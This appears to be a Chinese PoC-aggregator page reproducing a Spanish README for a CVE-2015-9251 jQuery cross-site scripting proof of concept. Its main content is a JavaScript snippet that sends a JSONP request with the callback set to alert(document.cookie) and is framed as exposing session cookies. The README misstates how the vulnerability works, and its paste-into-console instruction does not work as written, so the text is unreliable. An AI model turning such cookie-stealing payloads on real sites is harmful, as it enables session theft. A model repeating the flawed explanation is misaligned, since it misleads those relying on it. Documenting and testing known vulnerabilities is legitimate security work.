关联漏洞
标题:
jQuery 跨站脚本漏洞
(CVE-2015-9251)
描述:jQuery是美国John Resig个人开发者的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 jQuery 3.0.0之前版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
描述
PoC para CVE-2015-9251 jQuery menor a 3.0.0.
介绍
# CVE-2015-9251
# m10sec@proton.me
PoC para CVE-2015-9251 jQuery menor a 3.0.0.
# CVE-2015-9251 - PoC Exploit
Este repositorio contiene un **Proof of Concept (PoC)** para la vulnerabilidad **CVE-2015-9251** en la biblioteca **jQuery**. La vulnerabilidad permite un ataque de Cross-Site Scripting (XSS) a través de llamadas JSONP sin sanitización, debido a que jQuery permite la inyección de código en el parámetro `callback` en versiones anteriores a la 3.0.0.
---
## Descripción
**CVE-2015-9251** afecta a versiones de jQuery anteriores a la 3.0.0. La vulnerabilidad se explota al manipular el parámetro `callback` en una solicitud JSONP, lo cual puede permitir la ejecución de código JavaScript arbitrario en el navegador de la víctima. Esto puede llevar a la exposición de datos sensibles, como las cookies de sesión.
## Requisitos
1. **Entorno de Pruebas**: La aplicación web vulnerable debe utilizar una versión de jQuery menor a 3.0.0.
2. **Navegador Web**: Para ejecutar el PoC y observar el comportamiento del exploit.
3. **Herramienta de Inspección**: Las DevTools del navegador serán útiles para ver los resultados.
---
## Ejecución del PoC
Para ejecutar el PoC, sigue estos pasos:
1. **Copiar y pegar el código** en la consola del navegador o incluirlo en una página HTML de prueba.
### Código del PoC:
```javascript
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>
文件快照
[4.0K] /data/pocs/c71d04c19a8ae203416a504473cb05a73f90d704
├── [ 389] CVE-2015-9251.js
└── [1.7K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。